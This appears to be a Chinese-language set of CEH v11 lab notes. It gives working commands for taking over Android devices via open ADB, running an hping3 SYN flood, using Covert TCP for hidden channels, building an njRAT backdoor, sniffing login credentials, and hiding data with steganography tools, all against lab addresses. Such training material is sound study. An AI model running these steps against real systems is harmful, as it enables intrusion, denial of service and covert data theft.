ARIES

 入侵 Android 系統 使用 NMAP 掃描網路上的 Android 系統 IP 再透過 NMAP 掃描該 IP 有 Listen 的 Port (5555 Port) 透過指令 adb 連接 Android 系統 指令 : adb connect [IP:Port] 連接後確認連接指令 adb devices -l 登入 Android 系統 console 指令 : adb -s [IP:Port] shell 提權指令 : su - 尋找檔案 find / -name *secret*

 分析 SYN Flood 網路攻擊流量 於攻擊端執行 SYN Flood 針對目標主機 FTP Service 進行攻擊 指令 : sudo hping3 --flood --rand-source -S -p 21 10.10.10.10 參數 --flood : 指定發送大量封包 參數 --rand-source : 隨機產生來源端 IP 參數 -S : 指定 TCP SYN 旗標 參數 -p : 指定通訊 Port 攻擊前確認目標主機有 Listen 21 Port FTP Service 效能使用率低 攻擊後效能開始飆高 透過 netstat 可以看到隨機的來源 IP 連線本機端 21 Port 開啟 WireShark 監看 TCP 流量 封包中一樣顯示來源的隨機 IP，無法找出特定的攻擊端

 分析 Covert TCP 網路流量 使用工具 Covert TCP，將未編譯檔案複製至要接收訊息的主機 (10.10.10.9) 檔案位於工具包路徑 E:\CEH-Tools\CEHv11 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP 底下 ls 確認檔案存在於 Home 底下，進行編譯 指令 : gcc covert_tcp.c -o covert_tcp 再 ls 一次確認編譯完成檔案存在 執行指令開始接收訊息 指令 : sudo ./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -dest_port 8008 -source_port 9009 -server -file received.txt 參數 source : 送訊息的主機 參數 dest : 接收訊息的主機 同樣於要傳送訊息的主機 10.10.10.13 執行相同作業將工具進行編譯並確認存在 於要傳送訊息的主機建立一個文字檔 send.txt 當中的文字為 [ Top Secret!! ] 於送訊息主機端開啟 WireShark 進行封包抓取，過濾時選擇 TCP 即可 傳送端執行指令開始進行訊息傳送 指令 : sudo ./covert_tcp -source 10.10.10.13 -dest 10.10.10.9 -source_port 8008 -dest_port 9009 -file send.txt 注意這裡 -source、-dest 與前面一樣，但是 Port 的 source & dest 剛好顛倒 執行後可以看到開始傳送文字檔中的訊息如下 於接收端同樣可以看到文字訊息檔一個一個傳送過來，傳送完畢後可以 cat 檔案看一下內容 開啟 WireShark 可以看到傳送的訊息包在 TCP 封包表頭中，一個封包塞入一個文字慢慢傳送

 分析 njRAT 後門程式網路流量 一個封包內容顯示 JFIF 字樣( 16 進制顯示為 ffd8ff)，此為 JPG 圖片格式開頭特徵 主要是 Client 端中了 njRAT 後門程式，遠端操控的電腦在執行遠端桌面連線畫面時 所顯示畫面的封包特徵，因為是透過 JPG 格式傳送畫面 先了解甚麼是 njRAT，執行位於 E:\CEH-Tools\CEHv11 Module 07 Malware Threats\Trojans Types\Remote Access Trojans(RAT)\njRAT\njRAT v0.7d.exe 執行後使用預設的 Port 5552，點選 Start 點選左下的 Builder 於 Host 欄位輸入被連線的 Server 端 IP 10.10.10.10 預設存成檔案 server.exe 後點選 Build 這時候在 Server(操控端)啟用 WireShark 來看看封包 因為建立的主機端 Listen 5552 Port，所以抓封包時過濾查看 5552 Port 當受害端執行了後門程式後會主動與 Server 端連線，一旦連線建立後即可在操控端執行 遠端桌面連線與伺服器管理等多項遠端操控 回到 WireShark 點選封包進行 Follow --> TCP Stream 後將封包轉換成 "Hex Dump" 格式 即可看到如下 16 進制的 ffd8ff ，這是 JPEG 的標準格式，即遠端桌面連線顯示畫面傳送的格式 於受害端開啟工作管理員可以看到所執行的 server.exe 跑在 PID 2148 上 查看 netstat 與查找 PID 為 2148 顯示如下，可以看到與遠端操控端建立的連線使用 5552 Port

 分析 HTTP 協定網路流量 安裝 WireShark 路徑位於 E:\CEH-Tools\CEHv11 Module 03 Scanning Networks\Banner Grabbing Tools\Wireshare 開啟 WireShark 後設定過濾僅包含 10.10.10.19 目標主機的相關封包 參數 : host 10.10.10.19 開啟瀏覽器登入 10.10.10.19 主機的網站 網址 http://10.10.10.19/goodshopping/ 點選 Login 輸入帳號 smith 密碼 smith123 點選登入 於 WireShark 視窗中輸入參數 urlencoded-form 即可看到剛剛登入的帳號密碼於封包中 個人偏好使用參數 http.request.method == POST 來查閱 因為送出帳號密碼一定是 POST

 使用 SNOW 在文字檔中隱匿訊息 使用工具，位於 E:\CEH-Tools\CEHv11 Module 06 System Hacking\Steganography Tools\Whitespace Steganography Tools\Snow 底下的 snow.exe 執行 將執行檔 COPY 到桌面並建立一個 snow1.txt 內容輸入 Hello CEHP!! 指令 : SNOW.EXE -C -p ceh -m "Passing score: 70" snow1.txt snow2.txt 參數 -C : 表示進行壓縮 參數 -p : 加密密碼 參數 -m : 輸入之隱匿訊息 snow1.txt 為數 入檔案，snow2.txt 為輸出檔案 可以看到輸出後兩個檔案大小不一  檢視 snow2.txt 內容一樣，但當用輸入 Ctrl+A 時可以看到多了很多空白，即為隱匿訊息 解密方式如下圖 指令 : SNOW.EXE -C -p ceh snow2.txt 可以看到隱匿的訊息直接輸出

 使用 OpenStego 於圖檔中隱匿訊息 使用工具，位於 E:\CEH-Tools\CEHv11 Module 06 System Hacking\Steganography Tools\Image Steganography Tools\OpenStego 底下的 Setup-OpenStego-0.7.3.exe 進行安裝 要加密的文字訊息如下 選取該加密訊息檔案以及要使用的圖檔，並將檔案輸入至桌面另存為 stego.png 加密完成後顯示如下 開啟加密訊息的圖檔，就是一張簡單的圖 試著解密看看，如下 加密訊息輸出的桌面檔案開啟如下，與加密的內容一樣